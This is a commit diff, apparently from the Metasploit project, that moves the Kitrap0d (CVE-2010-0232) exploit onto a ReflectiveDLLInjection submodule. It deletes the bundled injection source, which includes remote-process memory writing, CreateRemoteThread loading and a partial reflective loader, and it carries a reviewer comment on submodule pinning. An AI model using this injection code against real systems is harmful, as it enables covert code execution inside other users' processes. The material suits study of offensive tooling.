
Add RDI submodule, port Kitrap0d

This commit is the first in a series that will move all the exploits that use RDI
over to the R7 fork. The RDI source will be in a single known location and each
exploit will have to work from that location.

The kitrap0d exploit has been migrated over to use this submodule so that there's
one example of how it's done for future contributions to follow.
OJ 5 years ago
parent
commit
468654d2b5

+ 3
- 0
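--- a/.gitmodules
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "external/source/ReflectiveDLLInjection"]
+	path = external/source/ReflectiveDLLInjection
+	url = https://github.com/rapid7/ReflectiveDLLInjection.git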
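Review bot: The new entry identifies the submodule only by path and URL, so the gitlink recorded in the sibling section (commit 88e8e5f109793f09b35cb17a621f33647d644103) is the sole integrity control over code that now enters every RDI-based build from an external repository; a later `git submodule update --remote` or a re-pointed URL changes what gets compiled without any diff in the exploit sources. A short comment in `.gitmodules` would make that expectation explicit, e.g. `# RDI is pinned by the gitlink; bump the pin deliberately and review the upstream diff before updating`. This commit also deletes the `common/` copies of GetProcAddressR.h, LoadLibraryR.h and ReflectiveDLLInjection.h under CVE-2010-0232, so any build file or include path there that still refers to `common/` must now resolve against the submodule path; those build changes are not visible in this part of the commit, so this is presumably handled elsewhere but worth confirming.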

+ 1
- 0
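--- a/external/source/ReflectiveDLLInjection
+++ b/external/source/ReflectiveDLLInjection
@@ -0,0 +1 @@
+Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103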

BIN
external/source/ReflectiveDllInjection_v1.0.zip View File


+ 0
- 116
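--- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
+++ b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
@@ -1,116 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "GetProcAddressR.h"
-//===============================================================================================//
-// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
-// wont be able to resolve exported addresses in reflectivly loaded librarys.
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
-{
-	UINT_PTR uiLibraryAddress = 0;
-	FARPROC fpResult          = NULL;
-
-	if( hModule == NULL )
-		return NULL;
-
-	// a module handle is really its base address
-	uiLibraryAddress = (UINT_PTR)hModule;
-
-	__try
-	{
-		UINT_PTR uiAddressArray = 0;
-		UINT_PTR uiNameArray    = 0;
-		UINT_PTR uiNameOrdinals = 0;
-		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
-		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
-		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
-			
-		// get the VA of the modules NT Header
-		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
-
-		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-		// get the VA of the export directory
-		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
-			
-		// get the VA for the array of addresses
-		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
-
-		// get the VA for the array of name pointers
-		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
-				
-		// get the VA for the array of name ordinals
-		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
-
-		// test if we are importing by name or by ordinal...
-		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
-		{
-			// import by ordinal...
-
-			// use the import ordinal (- export ordinal base) as an index into the array of addresses
-			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
-
-			// resolve the address for this imported function
-			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
-		}
-		else
-		{
-			// import by name...
-			DWORD dwCounter = pExportDirectory->NumberOfNames;
-			while( dwCounter-- )
-			{
-				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
-				
-				// test if we have a match...
-				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
-				{
-					// use the functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-					
-					// calculate the virtual address for the function
-					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
-					
-					// finish...
-					break;
-				}
-						
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		fpResult = NULL;
-	}
-
-	return fpResult;
-}
-//===============================================================================================//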

+ 0
- 36
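--- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h
+++ b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h
@@ -1,36 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
-//===============================================================================================//
-#endif
-//===============================================================================================//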

+ 0
- 233
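--- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c
+++ b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c
@@ -1,233 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "LoadLibraryR.h"
-//===============================================================================================//
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
-{    
-	WORD wIndex                          = 0;
-	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
-	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
-	
-	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
-
-	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
-
-    if( dwRva < pSectionHeader[0].PointerToRawData )
-        return dwRva;
-
-    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
-    {   
-        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
-           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
-    }
-    
-    return 0;
-}
-//===============================================================================================//
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
-{
-	UINT_PTR uiBaseAddress   = 0;
-	UINT_PTR uiExportDir     = 0;
-	UINT_PTR uiNameArray     = 0;
-	UINT_PTR uiAddressArray  = 0;
-	UINT_PTR uiNameOrdinals  = 0;
-	DWORD dwCounter          = 0;
-#ifdef _WIN64
-	DWORD dwMeterpreterArch = 2;
-#else
-	// This will catch Win32 and WinRT.
-	DWORD dwMeterpreterArch = 1;
-#endif
-
-	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
-
-	// get the File Offset of the modules NT Header
-	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-	// currenlty we can only process a PE file which is the same type as the one this fuction has  
-	// been compiled as, due to various offset in the PE structures being defined at compile time.
-	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
-	{
-		if( dwMeterpreterArch != 1 )
-			return 0;
-	}
-	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
-	{
-		if( dwMeterpreterArch != 2 )
-			return 0;
-	}
-	else
-	{
-		return 0;
-	}
-
-	// uiNameArray = the address of the modules export directory entry
-	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-	// get the File Offset of the export directory
-	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
-
-	// get the File Offset for the array of name pointers
-	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
-
-	// get the File Offset for the array of addresses
-	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
-	// get the File Offset for the array of name ordinals
-	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
-
-	// get a counter for the number of exported functions...
-	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
-
-	// loop through all the exported functions to find the ReflectiveLoader
-	while( dwCounter-- )
-	{
-		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
-		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
-		{
-			// get the File Offset for the array of addresses
-			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
-	
-			// use the functions name ordinal as an index into the array of name pointers
-			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-			// return the File Offset to the ReflectiveLoader() functions code...
-			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
-		}
-		// get the next exported function name
-		uiNameArray += sizeof(DWORD);
-
-		// get the next exported function name ordinal
-		uiNameOrdinals += sizeof(WORD);
-	}
-
-	return 0;
-}
-//===============================================================================================//
-// Loads a DLL image from memory via its exported ReflectiveLoader function
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
-{
-	HMODULE hResult                    = NULL;
-	DWORD dwReflectiveLoaderOffset     = 0;
-	DWORD dwOldProtect1                = 0;
-	DWORD dwOldProtect2                = 0;
-	REFLECTIVELOADER pReflectiveLoader = NULL;
-	DLLMAIN pDllMain                   = NULL;
-
-	if( lpBuffer == NULL || dwLength == 0 )
-		return NULL;
-
-	__try
-	{
-		// check if the library has a ReflectiveLoader...
-		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
-		if( dwReflectiveLoaderOffset != 0 )
-		{
-			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
-
-			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
-			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
-			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
-			{
-				// call the librarys ReflectiveLoader...
-				pDllMain = (DLLMAIN)pReflectiveLoader();
-				if( pDllMain != NULL )
-				{
-					// call the loaded librarys DllMain to get its HMODULE
-					// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
-					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
-						hResult = NULL;
-				}
-				// revert to the previous protection flags...
-				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
-			}
-		}
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		hResult = NULL;
-	}
-
-	return hResult;
-}
-//===============================================================================================//
-// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
-// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
-//       defined in order to use the correct RDI prototypes.
-// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
-//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
-// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
-// Note: This function currently cant inject accross architectures, but only to architectures which are the 
-//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
-{
-	LPVOID lpRemoteLibraryBuffer              = NULL;
-	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
-	HANDLE hThread                            = NULL;
-	DWORD dwReflectiveLoaderOffset            = 0;
-	DWORD dwThreadId                          = 0;
-
-	__try
-	{
-		do
-		{
-			if( !hProcess  || !lpBuffer || !dwLength )
-				break;
-
-			// check if the library has a ReflectiveLoader...
-			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
-			if( !dwReflectiveLoaderOffset )
-				break;
-
-			// alloc memory (RWX) in the host process for the image...
-			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
-			if( !lpRemoteLibraryBuffer )
-				break;
-
-			// write the image into the host process...
-			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
-				break;
-
-			// add the offset to ReflectiveLoader() to the remote library address...
-			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
-
-			// create a remote thread in the host process to call the ReflectiveLoader!
-			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
-
-		} while( 0 );
-
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		hThread = NULL;
-	}
-
-	return hThread;
-}
-//===============================================================================================//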

+ 0
- 41
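--- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h
+++ b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h
@@ -1,41 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
-
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
-
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
-
-//===============================================================================================//
-#endif
-//===============================================================================================//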

+ 0
- 53
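--- a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h
+++ b/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h
@@ -1,53 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH	4
-#define DLL_METASPLOIT_DETACH	5
-#define DLL_QUERY_HMODULE		6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT   __declspec( dllexport ) 
-
-//===============================================================================================//
-#endif
-//===============================================================================================//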

+ 0
- 599
external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c View File

@@ -1,599 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#include "ReflectiveLoader.h"
29
-//===============================================================================================//
30
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
31
-HINSTANCE hAppInstance = NULL;
32
-//===============================================================================================//
33
-#pragma intrinsic( _ReturnAddress )
34
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
35
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
36
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
37
-// available (and no inline asm available under x64).
38
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
39
-//===============================================================================================//
40
-
41
-#ifdef ENABLE_OUTPUTDEBUGSTRING
42
-#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
43
-#else /* ENABLE_OUTPUTDEBUGSTRING */
44
-#define OUTPUTDBG(str) do{}while(0)
45
-#endif
46
-
47
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
48
-//         otherwise the DllMain at the end of this file will be used.
49
-
50
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
51
-//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
52
-
53
-// This is our position independent reflective DLL loader/injector
54
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
55
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
56
-#else
57
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
58
-#endif
59
-{
60
-	// the functions we need
61
-	LOADLIBRARYA pLoadLibraryA     = NULL;
62
-	GETPROCADDRESS pGetProcAddress = NULL;
63
-	VIRTUALALLOC pVirtualAlloc     = NULL;
64
-	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
65
-#ifdef ENABLE_STOPPAGING
66
-	VIRTUALLOCK pVirtualLock	   = NULL;
67
-#endif
68
-#ifdef ENABLE_OUTPUTDEBUGSTRING
69
-	OUTPUTDEBUG pOutputDebug       = NULL;
70
-#endif
71
-
72
-	USHORT usCounter;
73
-
74
-	// the initial location of this image in memory
75
-	ULONG_PTR uiLibraryAddress;
76
-	// the kernels base address and later this images newly loaded base address
77
-	ULONG_PTR uiBaseAddress;
78
-
79
-	// variables for processing the kernels export table
80
-	ULONG_PTR uiAddressArray;
81
-	ULONG_PTR uiNameArray;
82
-	ULONG_PTR uiExportDir;
83
-	ULONG_PTR uiNameOrdinals;
84
-	DWORD dwHashValue;
85
-
86
-	// variables for loading this image
87
-	ULONG_PTR uiHeaderValue;
88
-	ULONG_PTR uiValueA;
89
-	ULONG_PTR uiValueB;
90
-	ULONG_PTR uiValueC;
91
-	ULONG_PTR uiValueD;
92
-	ULONG_PTR uiValueE;
93
-
94
-	// STEP 0: calculate our images current base address
95
-
96
-	// we will start searching backwards from our callers return address.
97
-	uiLibraryAddress = caller();
98
-
99
-	// loop through memory backwards searching for our images base address
100
-	// we dont need SEH style search as we shouldnt generate any access violations with this
101
-	while( TRUE )
102
-	{
103
-		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
104
-		{
105
-			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
106
